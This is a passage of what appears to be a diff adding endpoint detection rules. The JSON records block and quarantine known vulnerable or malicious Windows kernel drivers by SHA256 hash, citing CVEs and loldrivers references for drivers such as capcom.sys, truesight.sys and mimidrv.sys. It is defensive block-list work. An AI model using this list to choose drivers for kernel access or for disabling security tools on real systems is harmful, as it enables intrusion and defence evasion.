"a3c5955e-e179-5c4e-8154-459f9612fd1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614368Z", + "creation_date": "2026-03-23T11:45:29.614370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3c8343d-9d1c-58b8-8fad-5b3fb38f63c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983246Z", + "creation_date": "2026-03-23T11:45:29.983248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4720b202c4e6dd919222fe7b1f458705c0ed1ccc17ec4ba72a31eef8559b87c7", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3db3417-859c-5393-bc64-db0774694921", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812490Z", + "creation_date": "2026-03-23T11:45:31.812492Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f66a9cc214782799be3bdb1014d1ec4dfb4b6ba8f209541c4e0764469b1e123", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3dcb793-4f1a-5753-bc39-2de15ce8f40a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822683Z", + "creation_date": "2026-03-23T11:45:31.822687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "337ccdb7e3a677345eb209b58cfa8896aaf80b1171e615fc5673caff9756186d", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3e653c1-c9f6-5a4c-a3ee-2187375a2cf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490981Z", + "creation_date": "2026-03-23T11:45:31.490984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1a853f8a96a02d605cce4af31abb94ab234effda7a277958da4404c10e1be27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3e7125a-2506-5dbb-804a-d1f38d5feed7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476677Z", + "creation_date": "2026-03-23T11:45:30.476680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aee4d8a00f126582c4488025c7451fdbb9d0becbbfd58a396a2ac52011fac14", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3fcf42b-99e9-540c-95e6-c27eb037276f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464146Z", + "creation_date": "2026-03-23T11:45:30.464150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a400a95d-6df1-5aec-96d2-f03bfa855104", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149826Z", + "creation_date": "2026-03-23T11:45:31.149828Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d81e18a15f71397fb3ffba4f85d2b11f43a096c448544801ecc8c126cbda6e47", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a40c40a9-edea-543e-b6b7-095f63bc2241", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614300Z", + "creation_date": "2026-03-23T11:45:29.614302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.614307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f3e67f9454cb009716b89c0a296dcde73aa29145b7dcf776b81605932785b91", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a41768ec-7139-5541-8624-c2db288a7950", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821130Z", + "creation_date": "2026-03-23T11:45:31.821133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5abe2868d794a00debbeda3f6ac226ab8c5b8101fd27cd61e62d806e7810e511", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a42c9756-d8c7-5ab5-8bb6-f7693e2b16de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470784Z", + "creation_date": "2026-03-23T11:45:30.470788Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b29cf0840f2efe394091e07e6701c44916a9e3dafdef6952c1d28fbeb4649df3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4344b0b-c8b3-5981-9937-4a309c1e0e67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828936Z", + "creation_date": "2026-03-23T11:45:31.828938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828944Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"7fdfa7bec4063f465119df9587a268d1cca777b4c0e0d8e95d1189a3c7846d10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a440620e-bd1b-5a1c-8a0b-d7b1ff49f043", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456103Z", + "creation_date": "2026-03-23T11:45:30.456107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a082cdb569b9f1f82252402fa05785fd409222912d5b9e5423299819e6f940ed", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a44e20d5-cdec-5e1b-862b-deaad3c9dfaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821670Z", + "creation_date": "2026-03-23T11:45:30.821673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61f3b1c026d203ce94fab514e3d15090222c0eedc2a768cc2d073ec658671874", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a44fa1f9-671c-5378-ba22-09922073b2e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456595Z", + "creation_date": "2026-03-23T11:45:30.456598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "969f73a1da331e43777a3c1f08ec0734e7cf8c8136e5d469cbad8035fbfe3b47", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4802692-f5a6-54b8-8da5-6132fb3f246c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622650Z", + "creation_date": "2026-03-23T11:45:29.622652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83f7be0a13c1fccf024c31da5c68c0ea1decf4f48fc39d6e4fd324bbe789ae8a", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4859bef-e5d8-5b43-938e-3a497e89f50a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973466Z", + "creation_date": "2026-03-23T11:45:29.973468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12eda8b65ed8c1d80464a0c535ea099dffdb4981c134294cb0fa424efc85ee56", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a494d902-5e8c-5314-b400-2407d8cb0c45", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967362Z", + "creation_date": "2026-03-23T11:45:29.967364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c856c3c315c0f213684045da3203692c07c3da5df755155fd8b128fb447c437", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4968b88-9f68-5824-8cf3-da9c5c6d8de1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479757Z", + "creation_date": "2026-03-23T11:45:30.479759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479765Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b188ae51ec3be082e4d08f7483777ec5e66d30e393a4e9b5b9dc9af93d1f09b", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4991fdd-da7f-57a7-8587-6a117ad6ddfb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621669Z", + "creation_date": "2026-03-23T11:45:29.621670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "1afa03118f87b62c59a97617e595ebb26dde8dbdd16ee47ef3ddd1097c30ef6a", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4a39d73-91cb-5e25-b342-976c11e311b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143392Z", + "creation_date": "2026-03-23T11:45:32.143395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f190919f1668652249fa23d8c0455acbde9d344089fde96566239b1a18b91da2", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://www.loldrivers.io/drivers/fded7e63-0470-40fe-97ed-aa83fd027bad/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4a92be6-a947-537e-87d0-df1ce5ca235d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.828306Z", + "creation_date": "2026-03-23T11:45:31.828309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1816b4e2ae32be1cbfae6b53a5aa7bab282edaf5c3fd46e463978bb8c432f29", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4b75bd6-ba75-52ce-8038-96decadd39c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614404Z", + "creation_date": "2026-03-23T11:45:29.614406Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4b8ab98-2efa-56a4-85cb-3f2daaebfae6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472694Z", + "creation_date": "2026-03-23T11:45:30.472698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d6febd54ce0c98ea3653e582f7791061923a9a4842bd4a1326564204431ca9f", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4bd89c0-e928-5b3d-ae5e-3b0c92f12db0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821244Z", + "creation_date": "2026-03-23T11:45:30.821248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
